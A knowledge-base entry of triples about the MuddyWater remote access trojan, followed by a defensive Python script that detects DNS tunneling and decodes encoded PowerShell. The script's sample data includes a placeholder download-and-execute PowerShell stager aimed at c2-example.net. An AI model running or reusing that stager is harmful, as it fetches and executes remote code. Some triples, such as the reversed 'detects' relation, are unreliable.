MuddyWater Remote Access Trojan

GPTKB entity

Statements (39)

Predicate	Object
gptkbp:instanceOf	malware
gptkbp:abilities	gptkb:remote_control
gptkbp:abilities	data exfiltration
gptkbp:abilities	command execution
gptkbp:abilities	keylogging
gptkbp:alsoKnownAs	gptkb:MuddyWater_RAT
gptkbp:associatedWith	gptkb:APT34
gptkbp:associatedWith	Iranian threat actors
gptkbp:C2Communication	gptkb:HTTP
gptkbp:C2Communication	HTTPS
gptkbp:C2Communication	DNS tunneling
gptkbp:category	state-sponsored cyber espionage
gptkbp:category	advanced persistent threat tool
gptkbp:deliveredBy	phishing emails
gptkbp:deliveredBy	malicious attachments
gptkbp:detects	gptkb:Kaspersky
gptkbp:detects	gptkb:Symantec
gptkbp:detects	gptkb:Microsoft_Defender
gptkbp:firstObserved	2017
https://www.w3.org/2000/01/rdf-schema#label	MuddyWater Remote Access Trojan
gptkbp:operatingSystem	gptkb:Windows
gptkbp:programmingLanguage	gptkb:Python
gptkbp:programmingLanguage	gptkb:PowerShell
gptkbp:programmingLanguage	gptkb:C#
gptkbp:purpose	cyber espionage
gptkbp:purpose	data theft
gptkbp:relatedTo	gptkb:MuddyWater_group
gptkbp:target	gptkb:energy
gptkbp:target	government organizations
gptkbp:target	defense sector
gptkbp:target	telecommunications sector
gptkbp:usedBy	gptkb:MuddyWater
gptkbp:uses	PowerShell scripts
gptkbp:uses	custom backdoors
gptkbp:uses	living-off-the-land binaries
gptkbp:uses	obfuscation techniques
gptkbp:usesMalware	Remote Access Trojan
gptkbp:bfsParent	gptkb:MuddyWater_RAT
gptkbp:bfsLayer	7
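Two of the statements above, C2 over DNS tunneling and PowerShell scripts with obfuscation, correspond to checks a defender can run over existing telemetry. The script below is an added illustration written for this page; it is not GPTKB's, MuddyWater's, or any vendor's code and does not encode real MuddyWater indicators. The log lines are constructed, the field layout ("<type> <host> <payload>") is assumed, and the thresholds (label length 30, entropy 3.0 bits, 3 distinct queries per domain) are assumptions to be tuned against real traffic. It flags long, high-entropy DNS labels repeated under one parent domain and decodes Base64/UTF-16LE "-EncodedCommand" PowerShell invocations so the underlying script can be inspected.

```python
import base64
import math
import re
from collections import defaultdict

# Constructed sample telemetry (assumed layout, not real MuddyWater artefacts).
# The encoded PowerShell line is built from a plain-text stager so the Base64
# is correct by construction; "c2-example.net" is a placeholder domain.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2-example.net/a')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode("ascii")
SAMPLE_LOG = "\n".join([
    "dns host1 www.example.com",
    "dns host1 mail.example.com",
    "dns host1 6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b.c2-example.net",
    "dns host1 5b4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c.c2-example.net",
    "dns host1 a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4.c2-example.net",
    "dns host1 0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c.c2-example.net",
    r"proc host1 powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    f"proc host1 powershell.exe -nop -w hidden -enc {_ENCODED}",
])

# Accepts the abbreviations PowerShell itself accepts for -EncodedCommand.
_ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
_HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def shannon_entropy(s):
    """Bits of entropy per character; hex-encoded data tops out at 4.0."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def dns_label_suspicious(qname, min_label_len=30, min_entropy=3.0):
    """True when the leftmost label looks like encoded data rather than a hostname.
    Thresholds are assumptions; tune them per environment."""
    label = qname.split(".")[0]
    return len(label) >= min_label_len and shannon_entropy(label) >= min_entropy


def decode_encoded_powershell(cmdline):
    """Return the decoded script from a -EncodedCommand invocation, else None.
    PowerShell expects Base64 over UTF-16LE, so anything else is rejected."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(log_text, min_queries=3):
    """Run both checks over the log and return a list of alert dicts."""
    suspicious_dns = defaultdict(set)
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        kind, host, payload = line.split(" ", 2)
        if kind == "dns" and dns_label_suspicious(payload):
            # Assumption: the last two labels approximate the registered domain.
            parent = ".".join(payload.split(".")[-2:])
            suspicious_dns[(host, parent)].add(payload)
        elif kind == "proc":
            decoded = decode_encoded_powershell(payload)
            if decoded is not None:
                alerts.append({
                    "type": "encoded_powershell",
                    "host": host,
                    "script": decoded,
                    "hidden_window": bool(_HIDDEN_RE.search(payload)),
                })
    # One high-entropy label can be a CDN hash; several distinct ones under the
    # same parent domain from one host is the tunnelling pattern worth an alert.
    for (host, parent), names in suspicious_dns.items():
        if len(names) >= min_queries:
            alerts.append({"type": "dns_tunneling", "host": host,
                           "domain": parent, "queries": len(names)})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

On the constructed input the scan yields one encoded-PowerShell alert carrying the decoded download-and-execute stager with a hidden window, and one DNS-tunneling alert for four distinct encoded labels under c2-example.net; the benign script invocation and ordinary hostnames produce nothing. The decoded script is what an analyst should triage; the Base64 itself is not a useful indicator because trivial re-encoding changes it.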